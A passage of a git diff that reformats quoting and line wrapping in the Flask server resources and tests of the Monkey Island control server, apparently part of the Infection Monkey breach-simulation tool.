env_singleton.env.needs_registration()} + return {"needs_registration": env_singleton.env.needs_registration()} def post(self): credentials = UserCreds.get_from_json(request.data) diff --git a/monkey/monkey_island/cc/resources/bootloader.py b/monkey/monkey_island/cc/resources/bootloader.py index e722035ae..b228b9eea 100644 --- a/monkey/monkey_island/cc/resources/bootloader.py +++ b/monkey/monkey_island/cc/resources/bootloader.py @@ -11,9 +11,9 @@ class Bootloader(flask_restful.Resource): # Used by monkey. can't secure. def post(self, os): - if os == 'linux': + if os == "linux": data = Bootloader._get_request_contents_linux(request.data) - elif os == 'windows': + elif os == "windows": data = Bootloader._get_request_contents_windows(request.data) else: return make_response({"status": "OS_NOT_FOUND"}, 404) @@ -27,10 +27,13 @@ class Bootloader(flask_restful.Resource): @staticmethod def _get_request_contents_linux(request_data: bytes) -> Dict[str, str]: - parsed_data = json.loads(request_data.decode().replace("\"\n", "") - .replace("\n", "") - .replace("NAME=\"", "") - .replace("\":\",", "\":\"\",")) + parsed_data = json.loads( + request_data.decode() + .replace('"\n', "") + .replace("\n", "") + .replace('NAME="', "") + .replace('":",', '":"",') + ) return parsed_data @staticmethod diff --git a/monkey/monkey_island/cc/resources/bootloader_test.py b/monkey/monkey_island/cc/resources/bootloader_test.py index 5db86627c..83d780aa4 100644 --- a/monkey/monkey_island/cc/resources/bootloader_test.py +++ b/monkey/monkey_island/cc/resources/bootloader_test.py @@ -4,52 +4,57 @@ from monkey_island.cc.resources.bootloader import Bootloader class TestBootloader(TestCase): - def test_get_request_contents_linux(self): - data_without_tunnel = b'{"system":"linux", ' \ - b'"os_version":"NAME="Ubuntu"\n", ' \ - b'"glibc_version":"ldd (Ubuntu GLIBC 2.23-0ubuntu11) 2.23\n", ' \ - b'"hostname":"test-TEST", ' \ - b'"tunnel":false, ' \ - b'"ips": ["127.0.0.1", "10.0.2.15", "192.168.56.5"]}' - data_with_tunnel = b'{"system":"linux", ' \ - b'"os_version":"NAME="Ubuntu"\n", ' \ - b'"glibc_version":"ldd (Ubuntu GLIBC 2.23-0ubuntu11) 2.23\n", ' \ - b'"hostname":"test-TEST", ' \ - b'"tunnel":"192.168.56.1:5002", ' \ - b'"ips": ["127.0.0.1", "10.0.2.15", "192.168.56.5"]}' + data_without_tunnel = ( + b'{"system":"linux", ' + b'"os_version":"NAME="Ubuntu"\n", ' + b'"glibc_version":"ldd (Ubuntu GLIBC 2.23-0ubuntu11) 2.23\n", ' + b'"hostname":"test-TEST", ' + b'"tunnel":false, ' + b'"ips": ["127.0.0.1", "10.0.2.15", "192.168.56.5"]}' + ) + data_with_tunnel = ( + b'{"system":"linux", ' + b'"os_version":"NAME="Ubuntu"\n", ' + b'"glibc_version":"ldd (Ubuntu GLIBC 2.23-0ubuntu11) 2.23\n", ' + b'"hostname":"test-TEST", ' + b'"tunnel":"192.168.56.1:5002", ' + b'"ips": ["127.0.0.1", "10.0.2.15", "192.168.56.5"]}' + ) result1 = Bootloader._get_request_contents_linux(data_without_tunnel) - self.assertTrue(result1['system'] == "linux") - self.assertTrue(result1['os_version'] == "Ubuntu") - self.assertTrue(result1['glibc_version'] == "ldd (Ubuntu GLIBC 2.23-0ubuntu11) 2.23") - self.assertTrue(result1['hostname'] == "test-TEST") - self.assertFalse(result1['tunnel']) - self.assertTrue(result1['ips'] == ["127.0.0.1", "10.0.2.15", "192.168.56.5"]) + self.assertTrue(result1["system"] == "linux") + self.assertTrue(result1["os_version"] == "Ubuntu") + self.assertTrue(result1["glibc_version"] == "ldd (Ubuntu GLIBC 2.23-0ubuntu11) 2.23") + self.assertTrue(result1["hostname"] == "test-TEST") + self.assertFalse(result1["tunnel"]) + self.assertTrue(result1["ips"] == ["127.0.0.1", "10.0.2.15", "192.168.56.5"]) result2 = Bootloader._get_request_contents_linux(data_with_tunnel) - self.assertTrue(result2['system'] == "linux") - self.assertTrue(result2['os_version'] == "Ubuntu") - self.assertTrue(result2['glibc_version'] == "ldd (Ubuntu GLIBC 2.23-0ubuntu11) 2.23") - self.assertTrue(result2['hostname'] == "test-TEST") - self.assertTrue(result2['tunnel'] == "192.168.56.1:5002") - self.assertTrue(result2['ips'] == ["127.0.0.1", "10.0.2.15", "192.168.56.5"]) + self.assertTrue(result2["system"] == "linux") + self.assertTrue(result2["os_version"] == "Ubuntu") + self.assertTrue(result2["glibc_version"] == "ldd (Ubuntu GLIBC 2.23-0ubuntu11) 2.23") + self.assertTrue(result2["hostname"] == "test-TEST") + self.assertTrue(result2["tunnel"] == "192.168.56.1:5002") + self.assertTrue(result2["ips"] == ["127.0.0.1", "10.0.2.15", "192.168.56.5"]) def test_get_request_contents_windows(self): - windows_data = b'{\x00"\x00s\x00y\x00s\x00t\x00e\x00m\x00"\x00:\x00"\x00w\x00i\x00n\x00d\x00o' \ - b'\x00w\x00s\x00"\x00,\x00 \x00"\x00o\x00s\x00_\x00v\x00e\x00r\x00s\x00i\x00o\x00n' \ - b'\x00"\x00:\x00"\x00w\x00i\x00n\x00d\x00o\x00w\x00s\x008\x00_\x00o\x00r\x00_\x00g\x00r' \ - b'\x00e\x00a\x00t\x00e\x00r\x00"\x00,\x00 \x00"\x00h\x00o\x00s\x00t\x00n\x00a\x00m\x00e\x00"' \ - b'\x00:\x00"\x00D\x00E\x00S\x00K\x00T\x00O\x00P\x00-\x00P\x00J\x00H\x00U\x003\x006\x00B\x00"' \ - b'\x00,\x00 \x00"\x00t\x00u\x00n\x00n\x00e\x00l\x00"\x00:\x00f\x00a\x00l\x00s\x00e\x00,\x00 ' \ - b'\x00"\x00i\x00p\x00s\x00"\x00:\x00 \x00[\x00"\x001\x009\x002\x00.\x001\x006\x008\x00.\x005' \ - b'\x006\x00.\x001\x00"\x00,\x00 \x00"\x001\x009\x002\x00.\x001\x006\x008\x00.\x002\x004\x009' \ - b'\x00.\x001\x00"\x00,\x00 \x00"\x001\x009\x002\x00.\x001\x006\x008\x00.\x002\x001\x007\x00.' \ - b'\x001\x00"\x00]\x00}\x00' + windows_data = ( + b'{\x00"\x00s\x00y\x00s\x00t\x00e\x00m\x00"\x00:\x00"\x00w\x00i\x00n\x00d\x00o' + b'\x00w\x00s\x00"\x00,\x00 \x00"\x00o\x00s\x00_\x00v\x00e\x00r\x00s\x00i\x00o\x00n' + b'\x00"\x00:\x00"\x00w\x00i\x00n\x00d\x00o\x00w\x00s\x008\x00_\x00o\x00r\x00_\x00g\x00r' + b'\x00e\x00a\x00t\x00e\x00r\x00"\x00,\x00 \x00"\x00h\x00o\x00s\x00t\x00n\x00a\x00m\x00e\x00"' + b'\x00:\x00"\x00D\x00E\x00S\x00K\x00T\x00O\x00P\x00-\x00P\x00J\x00H\x00U\x003\x006\x00B\x00"' + b'\x00,\x00 \x00"\x00t\x00u\x00n\x00n\x00e\x00l\x00"\x00:\x00f\x00a\x00l\x00s\x00e\x00,\x00 ' + b'\x00"\x00i\x00p\x00s\x00"\x00:\x00 \x00[\x00"\x001\x009\x002\x00.\x001\x006\x008\x00.\x005' + b'\x006\x00.\x001\x00"\x00,\x00 \x00"\x001\x009\x002\x00.\x001\x006\x008\x00.\x002\x004\x009' + b'\x00.\x001\x00"\x00,\x00 \x00"\x001\x009\x002\x00.\x001\x006\x008\x00.\x002\x001\x007\x00.' + b'\x001\x00"\x00]\x00}\x00' + ) result = Bootloader._get_request_contents_windows(windows_data) - self.assertTrue(result['system'] == "windows") - self.assertTrue(result['os_version'] == "windows8_or_greater") - self.assertTrue(result['hostname'] == "DESKTOP-PJHU36B") - self.assertFalse(result['tunnel']) - self.assertTrue(result['ips'] == ["192.168.56.1", "192.168.249.1", "192.168.217.1"]) + self.assertTrue(result["system"] == "windows") + self.assertTrue(result["os_version"] == "windows8_or_greater") + self.assertTrue(result["hostname"] == "DESKTOP-PJHU36B") + self.assertFalse(result["tunnel"]) + self.assertTrue(result["ips"] == ["192.168.56.1", "192.168.249.1", "192.168.217.1"]) diff --git a/monkey/monkey_island/cc/resources/client_run.py b/monkey/monkey_island/cc/resources/client_run.py index 2396ba9b0..d747cbde6 100644 --- a/monkey/monkey_island/cc/resources/client_run.py +++ b/monkey/monkey_island/cc/resources/client_run.py @@ -5,7 +5,7 @@ from flask import jsonify, request from monkey_island.cc.services.node import NodeService -__author__ = 'itay.mizeretz' +__author__ = "itay.mizeretz" logger = logging.getLogger(__name__) diff --git a/monkey/monkey_island/cc/resources/edge.py b/monkey/monkey_island/cc/resources/edge.py index 3d284e82c..4985d8a4d 100644 --- a/monkey/monkey_island/cc/resources/edge.py +++ b/monkey/monkey_island/cc/resources/edge.py @@ -3,12 +3,12 @@ from flask import request from monkey_island.cc.services.edge.displayed_edge import DisplayedEdgeService -__author__ = 'Barak' +__author__ = "Barak" class Edge(flask_restful.Resource): def get(self): - edge_id = request.args.get('id') + edge_id = request.args.get("id") displayed_edge = DisplayedEdgeService.get_displayed_edge_by_id(edge_id) if edge_id: return {"edge": displayed_edge} diff --git a/monkey/monkey_island/cc/resources/environment.py b/monkey/monkey_island/cc/resources/environment.py index 9f9a89105..03333b029 100644 --- a/monkey/monkey_island/cc/resources/environment.py +++ b/monkey/monkey_island/cc/resources/environment.py @@ -12,8 +12,10 @@ logger = logging.getLogger(__name__) class Environment(flask_restful.Resource): def patch(self): env_data = json.loads(request.data) - if env_data['server_config'] == "standard": + if env_data["server_config"] == "standard": if env_singleton.env.needs_registration(): env_singleton.set_to_standard() - logger.warning("No user registered, Island on standard mode - no credentials required to access.") + logger.warning( + "No user registered, Island on standard mode - no credentials required to access." + ) return {} diff --git a/monkey/monkey_island/cc/resources/island_configuration.py b/monkey/monkey_island/cc/resources/island_configuration.py index b8a556016..42730e477 100644 --- a/monkey/monkey_island/cc/resources/island_configuration.py +++ b/monkey/monkey_island/cc/resources/island_configuration.py @@ -10,13 +10,15 @@ from monkey_island.cc.services.config import ConfigService class IslandConfiguration(flask_restful.Resource): @jwt_required def get(self): - return jsonify(schema=ConfigService.get_config_schema(), - configuration=ConfigService.get_config(False, True, True)) + return jsonify( + schema=ConfigService.get_config_schema(), + configuration=ConfigService.get_config(False, True, True), + ) @jwt_required def post(self): config_json = json.loads(request.data) - if 'reset' in config_json: + if "reset" in config_json: ConfigService.reset_config() else: if not ConfigService.update_config(config_json, should_encrypt=True): diff --git a/monkey/monkey_island/cc/resources/island_logs.py b/monkey/monkey_island/cc/resources/island_logs.py index b643f2147..0aa1f6480 100644 --- a/monkey/monkey_island/cc/resources/island_logs.py +++ b/monkey/monkey_island/cc/resources/island_logs.py @@ -16,4 +16,4 @@ class IslandLog(flask_restful.Resource): try: return IslandLogService.get_log_file() except Exception: - logger.error('Monkey Island logs failed to download', exc_info=True) + logger.error("Monkey Island logs failed to download", exc_info=True) diff --git a/monkey/monkey_island/cc/resources/local_run.py b/monkey/monkey_island/cc/resources/local_run.py index 0758d40c2..021df512a 100644 --- a/monkey/monkey_island/cc/resources/local_run.py +++ b/monkey/monkey_island/cc/resources/local_run.py @@ -15,7 +15,7 @@ from monkey_island.cc.resources.auth.auth import jwt_required from monkey_island.cc.resources.monkey_download import get_monkey_executable from monkey_island.cc.services.node import NodeService -__author__ = 'Barak' +__author__ = "Barak" logger = logging.getLogger(__name__) @@ -31,25 +31,28 @@ def run_local_monkey(): if not result: return False, "OS Type not found" - monkey_path = os.path.join(MONKEY_ISLAND_ABS_PATH, 'cc', 'binaries', result['filename']) - target_path = os.path.join(env_singleton.env.get_config().data_dir_abs_path, result['filename']) + monkey_path = os.path.join(MONKEY_ISLAND_ABS_PATH, "cc", "binaries", result["filename"]) + target_path = os.path.join(env_singleton.env.get_config().data_dir_abs_path, result["filename"]) # copy the executable to temp path (don't run the monkey from its current location as it may delete itself) try: copyfile(monkey_path, target_path) os.chmod(target_path, stat.S_IRWXU | stat.S_IRWXG) except Exception as exc: - logger.error('Copy file failed', exc_info=True) + logger.error("Copy file failed", exc_info=True) return False, "Copy file failed: %s" % exc # run the monkey try: - args = ['"%s" m0nk3y -s %s:%s' % (target_path, local_ip_addresses()[0], env_singleton.env.get_island_port())] + args = [ + '"%s" m0nk3y -s %s:%s' + % (target_path, local_ip_addresses()[0], env_singleton.env.get_island_port()) + ] if sys.platform == "win32": args = "".join(args) subprocess.Popen(args, shell=True).pid except Exception as exc: - logger.error('popen failed', exc_info=True) + logger.error("popen failed", exc_info=True) return False, "popen failed: %s" % exc return True, "" @@ -70,9 +73,9 @@ class LocalRun(flask_restful.Resource): @jwt_required def post(self): body = json.loads(request.data) - if body.get('action') == 'run': + if body.get("action") == "run": local_run = run_local_monkey() return jsonify(is_running=local_run[0], error_text=local_run[1]) # default action - return make_response({'error': 'Invalid action'}, 500) + return make_response({"error": "Invalid action"}, 500) diff --git a/monkey/monkey_island/cc/resources/log.py b/monkey/monkey_island/cc/resources/log.py index 0d437d174..aae23fed3 100644 --- a/monkey/monkey_island/cc/resources/log.py +++ b/monkey/monkey_island/cc/resources/log.py @@ -16,8 +16,8 @@ __author__ = "itay.mizeretz" class Log(flask_restful.Resource): @jwt_required def get(self): - monkey_id = request.args.get('id') - exists_monkey_id = request.args.get('exists') + monkey_id = request.args.get("id") + exists_monkey_id = request.args.get("exists") if monkey_id: return LogService.get_log_by_monkey_id(ObjectId(monkey_id)) else: @@ -28,9 +28,9 @@ class Log(flask_restful.Resource): def post(self): telemetry_json = json.loads(request.data) - monkey_id = NodeService.get_monkey_by_guid(telemetry_json['monkey_guid'])['_id'] + monkey_id = NodeService.get_monkey_by_guid(telemetry_json["monkey_guid"])["_id"] # This shouldn't contain any unicode characters. this'll take 2 time less space. - log_data = str(telemetry_json['log']) + log_data = str(telemetry_json["log"]) log_id = LogService.add_log(monkey_id, log_data) return mongo.db.log.find_one_or_404({"_id": log_id}) diff --git a/monkey/monkey_island/cc/resources/monkey.py b/monkey/monkey_island/cc/resources/monkey.py index 0e6fe0370..9f5c9670b 100644 --- a/monkey/monkey_island/cc/resources/monkey.py +++ b/monkey/monkey_island/cc/resources/monkey.py @@ -13,7 +13,7 @@ from monkey_island.cc.services.config import ConfigService from monkey_island.cc.services.edge.edge import EdgeService from monkey_island.cc.services.node import NodeService -__author__ = 'Barak' +__author__ = "Barak" # TODO: separate logic from interface @@ -25,11 +25,11 @@ class Monkey(flask_restful.Resource): def get(self, guid=None, **kw): NodeService.update_dead_monkeys() # refresh monkeys status if not guid: - guid = request.args.get('guid') + guid = request.args.get("guid") if guid: monkey_json = mongo.db.monkey.find_one_or_404({"guid": guid}) - monkey_json['config'] = ConfigService.decrypt_flat_config(monkey_json['config']) + monkey_json["config"] = ConfigService.decrypt_flat_config(monkey_json["config"]) return monkey_json return {} @@ -38,23 +38,23 @@ class Monkey(flask_restful.Resource): @TestTelemStore.store_test_telem def patch(self, guid): monkey_json = json.loads(request.data) - update = {"$set": {'modifytime': datetime.now()}} + update = {"$set": {"modifytime": datetime.now()}} monkey = NodeService.get_monkey_by_guid(guid) - if 'keepalive' in monkey_json: - update['$set']['keepalive'] = dateutil.parser.parse(monkey_json['keepalive']) + if "keepalive" in monkey_json: + update["$set"]["keepalive"] = dateutil.parser.parse(monkey_json["keepalive"]) else: - update['$set']['keepalive'] = datetime.now() - if 'config' in monkey_json: - update['$set']['config'] = monkey_json['config'] - if 'config_error' in monkey_json: - update['$set']['config_error'] = monkey_json['config_error'] + update["$set"]["keepalive"] = datetime.now() + if "config" in monkey_json: + update["$set"]["config"] = monkey_json["config"] + if "config_error" in monkey_json: + update["$set"]["config_error"] = monkey_json["config_error"] - if 'tunnel' in monkey_json: - tunnel_host_ip = monkey_json['tunnel'].split(":")[-2].replace("//", "") + if "tunnel" in monkey_json: + tunnel_host_ip = monkey_json["tunnel"].split(":")[-2].replace("//", "") NodeService.set_monkey_tunnel(monkey["_id"], tunnel_host_ip) ttl = create_monkey_ttl_document(DEFAULT_MONKEY_TTL_EXPIRY_DURATION_IN_SECONDS) - update['$set']['ttl_ref'] = ttl.id + update["$set"]["ttl_ref"] = ttl.id return mongo.db.monkey.update({"_id": monkey["_id"]}, update, upsert=False) @@ -63,14 +63,14 @@ class Monkey(flask_restful.Resource): @TestTelemStore.store_test_telem def post(self, **kw): monkey_json = json.loads(request.data) - monkey_json['creds'] = [] - monkey_json['dead'] = False - if 'keepalive' in monkey_json: - monkey_json['keepalive'] = dateutil.parser.parse(monkey_json['keepalive']) + monkey_json["creds"] = [] + monkey_json["dead"] = False + if "keepalive" in monkey_json: + monkey_json["keepalive"] = dateutil.parser.parse(monkey_json["keepalive"]) else: - monkey_json['keepalive'] = datetime.now() + monkey_json["keepalive"] = datetime.now() - monkey_json['modifytime'] = datetime.now() + monkey_json["modifytime"] = datetime.now() ConfigService.save_initial_config_if_needed() @@ -79,47 +79,63 @@ class Monkey(flask_restful.Resource): # Update monkey configuration new_config = ConfigService.get_flat_config(False, False) - monkey_json['config'] = monkey_json.get('config', {}) - monkey_json['config'].update(new_config) + monkey_json["config"] = monkey_json.get("config", {}) + monkey_json["config"].update(new_config) # try to find new monkey parent - parent = monkey_json.get('parent') - parent_to_add = (monkey_json.get('guid'), None) # default values in case of manual run - if parent and parent != monkey_json.get('guid'): # current parent is known - exploit_telem = [x for x in - mongo.db.telemetry.find({'telem_category': {'$eq': 'exploit'}, - 'data.result': {'$eq': True}, - 'data.machine.ip_addr': {'$in': monkey_json['ip_addresses']}, - 'monkey_guid': {'$eq': parent}})] + parent = monkey_json.get("parent") + parent_to_add = (monkey_json.get("guid"), None) # default values in case of manual run + if parent and parent != monkey_json.get("guid"): # current parent is known + exploit_telem = [ + x + for x in mongo.db.telemetry.find( + { + "telem_category": {"$eq": "exploit"}, + "data.result": {"$eq": True}, + "data.machine.ip_addr": {"$in": monkey_json["ip_addresses"]}, + "monkey_guid": {"$eq": parent}, + } + ) + ] if 1 == len(exploit_telem): - parent_to_add = (exploit_telem[0].get('monkey_guid'), exploit_telem[0].get('data').get('exploiter')) + parent_to_add = ( + exploit_telem[0].get("monkey_guid"), + exploit_telem[0].get("data").get("exploiter"), + ) else: parent_to_add = (parent, None) - elif (not parent or parent == monkey_json.get('guid')) and 'ip_addresses' in monkey_json: - exploit_telem = [x for x in - mongo.db.telemetry.find({'telem_category': {'$eq': 'exploit'}, - 'data.result': {'$eq': True}, - 'data.machine.ip_addr': {'$in': monkey_json['ip_addresses']}})] + elif (not parent or parent == monkey_json.get("guid")) and "ip_addresses" in monkey_json: + exploit_telem = [ + x + for x in mongo.db.telemetry.find( + { + "telem_category": {"$eq": "exploit"}, + "data.result": {"$eq": True}, + "data.machine.ip_addr": {"$in": monkey_json["ip_addresses"]}, + } + ) + ] if 1 == len(exploit_telem): - parent_to_add = (exploit_telem[0].get('monkey_guid'), exploit_telem[0].get('data').get('exploiter')) + parent_to_add = ( + exploit_telem[0].get("monkey_guid"), + exploit_telem[0].get("data").get("exploiter"), + ) if not db_monkey: - monkey_json['parent'] = [parent_to_add] + monkey_json["parent"] = [parent_to_add] else: - monkey_json['parent'] = db_monkey.get('parent') + [parent_to_add] + monkey_json["parent"] = db_monkey.get("parent") + [parent_to_add] tunnel_host_ip = None - if 'tunnel' in monkey_json: - tunnel_host_ip = monkey_json['tunnel'].split(":")[-2].replace("//", "") - monkey_json.pop('tunnel') + if "tunnel" in monkey_json: + tunnel_host_ip = monkey_json["tunnel"].split(":")[-2].replace("//", "") + monkey_json.pop("tunnel") ttl = create_monkey_ttl_document(DEFAULT_MONKEY_TTL_EXPIRY_DURATION_IN_SECONDS) - monkey_json['ttl_ref'] = ttl.id + monkey_json["ttl_ref"] = ttl.id - mongo.db.monkey.update({"guid": monkey_json["guid"]}, - {"$set": monkey_json}, - upsert=True) + mongo.db.monkey.update({"guid": monkey_json["guid"]}, {"$set": monkey_json}, upsert=True) # Merge existing scanned node with new monkey @@ -128,13 +144,14 @@ class Monkey(flask_restful.Resource): if tunnel_host_ip is not None: NodeService.set_monkey_tunnel(new_monkey_id, tunnel_host_ip) - existing_node = mongo.db.node.find_one({"ip_addresses": {"$in": monkey_json["ip_addresses"]}}) + existing_node = mongo.db.node.find_one( + {"ip_addresses": {"$in": monkey_json["ip_addresses"]}} + ) if existing_node: node_id = existing_node["_id"] - EdgeService.update_all_dst_nodes(old_dst_node_id=node_id, - new_dst_node_id=new_monkey_id) - for creds in existing_node['creds']: + EdgeService.update_all_dst_nodes(old_dst_node_id=node_id, new_dst_node_id=new_monkey_id) + for creds in existing_node["creds"]: NodeService.add_credentials_to_monkey(new_monkey_id, creds) mongo.db.node.remove({"_id": node_id}) diff --git a/monkey/monkey_island/cc/resources/monkey_configuration.py b/monkey/monkey_island/cc/resources/monkey_configuration.py index e6b94cf81..d4e415e88 100644 --- a/monkey/monkey_island/cc/resources/monkey_configuration.py +++ b/monkey/monkey_island/cc/resources/monkey_configuration.py @@ -6,18 +6,21 @@ from flask import abort, jsonify, request from monkey_island.cc.resources.auth.auth import jwt_required from monkey_island.cc.services.config import ConfigService -__author__ = 'Barak' +__author__ = "Barak" class MonkeyConfiguration(flask_restful.Resource): @jwt_required def get(self): - return jsonify(schema=ConfigService.get_config_schema(), configuration=ConfigService.get_config(False, True)) + return jsonify( + schema=ConfigService.get_config_schema(), + configuration=ConfigService.get_config(False, True), + ) @jwt_required def post(self): config_json = json.loads(request.data) - if 'reset' in config_json: + if "reset" in config_json: ConfigService.reset_config() else: if not ConfigService.update_config(config_json, should_encrypt=True): diff --git a/monkey/monkey_island/cc/resources/monkey_control/started_on_island.py b/monkey/monkey_island/cc/resources/monkey_control/started_on_island.py index 552dce51e..f0d7e411f 100644 --- a/monkey/monkey_island/cc/resources/monkey_control/started_on_island.py +++ b/monkey/monkey_island/cc/resources/monkey_control/started_on_island.py @@ -11,6 +11,6 @@ class StartedOnIsland(flask_restful.Resource): # Used by monkey. can't secure. def post(self): data = json.loads(request.data) - if data['started_on_island']: + if data["started_on_island"]: ConfigService.set_started_on_island(True) return make_response({}, 200) diff --git a/monkey/monkey_island/cc/resources/monkey_download.py b/monkey/monkey_island/cc/resources/monkey_download.py index c9d3127a4..5620425aa 100644 --- a/monkey/monkey_island/cc/resources/monkey_download.py +++ b/monkey/monkey_island/cc/resources/monkey_download.py @@ -8,64 +8,67 @@ from flask import request, send_from_directory from monkey_island.cc.server_utils.consts import MONKEY_ISLAND_ABS_PATH -__author__ = 'Barak' +__author__ = "Barak" logger = logging.getLogger(__name__) MONKEY_DOWNLOADS = [ { - 'type': 'linux', - 'machine': 'x86_64', - 'filename': 'monkey-linux-64', + "type": "linux", + "machine": "x86_64", + "filename": "monkey-linux-64", }, { - 'type': 'linux', - 'machine': 'i686', - 'filename': 'monkey-linux-32', + "type": "linux", + "machine": "i686", + "filename": "monkey-linux-32", }, { - 'type': 'linux', - 'machine': 'i386', - 'filename': 'monkey-linux-32', + "type": "linux", + "machine": "i386", + "filename": "monkey-linux-32", }, { - 'type': 'linux', - 'filename': 'monkey-linux-64', + "type": "linux", + "filename": "monkey-linux-64", }, { - 'type': 'windows', - 'machine': 'x86', - 'filename': 'monkey-windows-32.exe', + "type": "windows", + "machine": "x86", + "filename": "monkey-windows-32.exe", }, { - 'type': 'windows', - 'machine': 'amd64', - 'filename': 'monkey-windows-64.exe', + "type": "windows", + "machine": "amd64", + "filename": "monkey-windows-64.exe", }, { - 'type': 'windows', - 'machine': '64', - 'filename': 'monkey-windows-64.exe', + "type": "windows", + "machine": "64", + "filename": "monkey-windows-64.exe", }, { - 'type': 'windows', - 'machine': '32', - 'filename': 'monkey-windows-32.exe', + "type": "windows", + "machine": "32", + "filename": "monkey-windows-32.exe", }, { - 'type': 'windows', - 'filename': 'monkey-windows-32.exe', + "type": "windows", + "filename": "monkey-windows-32.exe", }, ] def get_monkey_executable(host_os, machine): for download in MONKEY_DOWNLOADS: - if host_os == download.get('type') and machine == download.get('machine'): - logger.info('Monkey exec found for os: {0} and machine: {1}'.format(host_os, machine)) + if host_os == download.get("type") and machine == download.get("machine"): + logger.info("Monkey exec found for os: {0} and machine: {1}".format(host_os, machine)) return download - logger.warning('No monkey executables could be found for the host os or machine or both: host_os: {0}, machine: {1}' - .format(host_os, machine)) + logger.warning( + "No monkey executables could be found for the host os or machine or both: host_os: {0}, machine: {1}".format( + host_os, machine + ) + ) return None @@ -73,28 +76,28 @@ class MonkeyDownload(flask_restful.Resource): # Used by monkey. can't secure. def get(self, path): - return send_from_directory(os.path.join(MONKEY_ISLAND_ABS_PATH, 'cc', 'binaries'), path) + return send_from_directory(os.path.join(MONKEY_ISLAND_ABS_PATH, "cc", "binaries"), path) # Used by monkey. can't secure. def post(self): host_json = json.loads(request.data) - host_os = host_json.get('os') + host_os = host_json.get("os") if host_os: - result = get_monkey_executable(host_os.get('type'), host_os.get('machine')) + result = get_monkey_executable(host_os.get("type"), host_os.get("machine")) if result: # change resulting from new base path - executable_filename = result['filename'] + executable_filename = result["filename"] real_path = MonkeyDownload.get_executable_full_path(executable_filename) if os.path.isfile(real_path): - result['size'] = os.path.getsize(real_path) + result["size"] = os.path.getsize(real_path) return result return {} @staticmethod def get_executable_full_path(executable_filename): - real_path = os.path.join(MONKEY_ISLAND_ABS_PATH, "cc", 'binaries', executable_filename) + real_path = os.path.join(MONKEY_ISLAND_ABS_PATH, "cc", "binaries", executable_filename) return real_path @staticmethod @@ -102,15 +105,16 @@ class MonkeyDownload(flask_restful.Resource): """ Logs all the hashes of the monkey executables for debugging ease (can check what Monkey version you have etc.). """ - filenames = set([x['filename'] for x in MONKEY_DOWNLOADS]) + filenames = set([x["filename"] for x in MONKEY_DOWNLOADS]) for filename in filenames: filepath = MonkeyDownload.get_executable_full_path(filename) if os.path.isfile(filepath): - with open(filepath, 'rb') as monkey_exec_file: + with open(filepath, "rb") as monkey_exec_file: file_contents = monkey_exec_file.read() - logger.debug("{} hashes:\nSHA-256 {}".format( - filename, - hashlib.sha256(file_contents).hexdigest() - )) + logger.debug( + "{} hashes:\nSHA-256 {}".format( + filename, hashlib.sha256(file_contents).hexdigest() + ) + ) else: logger.debug("No monkey executable for {}.".format(filepath)) diff --git a/monkey/monkey_island/cc/resources/netmap.py b/monkey/monkey_island/cc/resources/netmap.py index 899dc478c..1dfa14657 100644 --- a/monkey/monkey_island/cc/resources/netmap.py +++ b/monkey/monkey_island/cc/resources/netmap.py @@ -4,7 +4,7 @@ from monkey_island.cc.resources.auth.auth import jwt_required from monkey_island.cc.services.netmap.net_edge import NetEdgeService from monkey_island.cc.services.netmap.net_node import NetNodeService -__author__ = 'Barak' +__author__ = "Barak" class NetMap(flask_restful.Resource): @@ -13,8 +13,4 @@ class NetMap(flask_restful.Resource): net_nodes = NetNodeService.get_all_net_nodes() net_edges = NetEdgeService.get_all_net_edges() - return \ - { - "nodes": net_nodes, - "edges": net_edges - } + return {"nodes": net_nodes, "edges": net_edges} diff --git a/monkey/monkey_island/cc/resources/node.py b/monkey/monkey_island/cc/resources/node.py index ff630b9a4..ffaadaec9 100644 --- a/monkey/monkey_island/cc/resources/node.py +++ b/monkey/monkey_island/cc/resources/node.py @@ -4,13 +4,13 @@ from flask import request from monkey_island.cc.resources.auth.auth import jwt_required from monkey_island.cc.services.node import NodeService -__author__ = 'Barak' +__author__ = "Barak" class Node(flask_restful.Resource): @jwt_required def get(self): - node_id = request.args.get('id') + node_id = request.args.get("id") if node_id: return NodeService.get_displayed_node_by_id(node_id) diff --git a/monkey/monkey_island/cc/resources/node_states.py b/monkey/monkey_island/cc/resources/node_states.py index 87be11ab5..073aafffd 100644 --- a/monkey/monkey_island/cc/resources/node_states.py +++ b/monkey/monkey_island/cc/resources/node_states.py @@ -7,4 +7,4 @@ from monkey_island.cc.services.utils.node_states import NodeStates as NodeStateL class NodeStates(flask_restful.Resource): @jwt_required def get(self): - return {'node_states': [state.value for state in NodeStateList]} + return {"node_states": [state.value for state in NodeStateList]} diff --git a/monkey/monkey_island/cc/resources/pba_file_download.py b/monkey/monkey_island/cc/resources/pba_file_download.py index 4fe05c98f..aa5465b0d 100644 --- a/monkey/monkey_island/cc/resources/pba_file_download.py +++ b/monkey/monkey_island/cc/resources/pba_file_download.py @@ -3,7 +3,7 @@ from flask import send_from_directory from monkey_island.cc.services.post_breach_files import ABS_UPLOAD_PATH -__author__ = 'VakarisZ' +__author__ = "VakarisZ" class PBAFileDownload(flask_restful.Resource): diff --git a/monkey/monkey_island/cc/resources/pba_file_upload.py b/monkey/monkey_island/cc/resources/pba_file_upload.py index 6d6795f74..36f138f10 100644 --- a/monkey/monkey_island/cc/resources/pba_file_upload.py +++ b/monkey/monkey_island/cc/resources/pba_file_upload.py @@ -8,21 +8,25 @@ from werkzeug.utils import secure_filename from monkey_island.cc.resources.auth.auth import jwt_required from monkey_island.cc.services.config import ConfigService -from monkey_island.cc.services.post_breach_files import (ABS_UPLOAD_PATH, PBA_LINUX_FILENAME_PATH, - PBA_WINDOWS_FILENAME_PATH) +from monkey_island.cc.services.post_breach_files import ( + ABS_UPLOAD_PATH, + PBA_LINUX_FILENAME_PATH, + PBA_WINDOWS_FILENAME_PATH, +) -__author__ = 'VakarisZ' +__author__ = "VakarisZ" LOG = logging.getLogger(__name__) # Front end uses these strings to identify which files to work with (linux of windows) -LINUX_PBA_TYPE = 'PBAlinux' -WINDOWS_PBA_TYPE = 'PBAwindows' +LINUX_PBA_TYPE = "PBAlinux" +WINDOWS_PBA_TYPE = "PBAwindows" class FileUpload(flask_restful.Resource): """ File upload endpoint used to exchange files with filepond component on the front-end """ + def __init__(self): # Create all directories on the way if they don't exist ABS_UPLOAD_PATH.mkdir(parents=True, exist_ok=True) @@ -50,9 +54,7 @@ class FileUpload(flask_restful.Resource): """ filename = FileUpload.upload_pba_file(request, (file_type == LINUX_PBA_TYPE)) - response = Response( - response=filename, - status=200, mimetype='text/plain') + response = Response(response=filename, status=200, 